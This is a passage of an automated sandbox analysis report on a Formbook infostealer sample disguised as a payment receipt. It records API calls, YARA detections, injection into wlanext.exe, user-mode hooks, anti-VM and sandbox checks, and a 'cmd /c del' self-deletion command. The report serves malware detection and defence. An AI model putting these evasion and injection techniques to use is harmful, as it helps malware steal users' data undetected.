          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9EA0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9E20 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9F50 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9D70 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9E1F NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9F4C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9DC2 NtCreateFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_008BC2B0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_008B9970
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_0492CBE8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_049280A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_04926E98
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_04926EA8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_0492CBDA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E74F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E01D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E01E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E74E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E6A50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E6A41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041D3C1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041E5DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409E3D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BF900
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471002
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148E824
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014828EC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB090
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014820A8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0145CB4F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01482B28
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAB40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EEBB0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147DBD2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014703DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EABD8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146FA2B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014822AE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B0D20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01481D55
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01482D07
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014825DD
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147D466
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C841F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148DFCE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01481FF1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D6E30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147D616
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01482EF7
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01461EB6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037BCB4F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374ABD8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037DDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373EB9A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373B236
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CFA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D4AEF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03734120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037399BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A830
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037EE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037420A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037EDFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03736E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037DD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03735600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C1EB6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03710D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03742581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D2D82
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373B477
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037DD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D4496
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB9E40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB9E3D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECE5DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0371B150 appears 145 times
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: String function: 013BB150 appears 145 times
          Source: Final-Payment-Receipt.exe, 00000000.00000000.224938714.000000000009A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000000.00000002.236173671.0000000005570000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263682500.000000000163F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000000.230648547.000000000095A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263300020.0000000001382000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exeBinary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Final-Payment-Receipt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_01
          Source: Final-Payment-Receipt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Final-Payment-Receipt.exeReversingLabs: Detection: 34%
          Source: unknownProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Final-Payment-Receipt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Final-Payment-Receipt.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Final-Payment-Receipt.exe, 00000001.00000002.263431017.00000000014AF000.00000040.00000001.sdmp, wlanext.exe, 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Final-Payment-Receipt.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E556E push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041B11C push es; iretd
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040E3C1 pushad ; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040E417 pushad ; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00417619 pushfd ; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CEC5 push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CF7C push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CF12 push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CF1B push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0140D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0376D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECDA3E push 00000072h; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EBE3C1 pushad ; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECB11C push es; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCEC5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC7619 pushfd ; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCF7C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCF1B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCF12 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EBE417 pushad ; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.8171947974

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Final-Payment-Receipt.exe PID: 1692, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
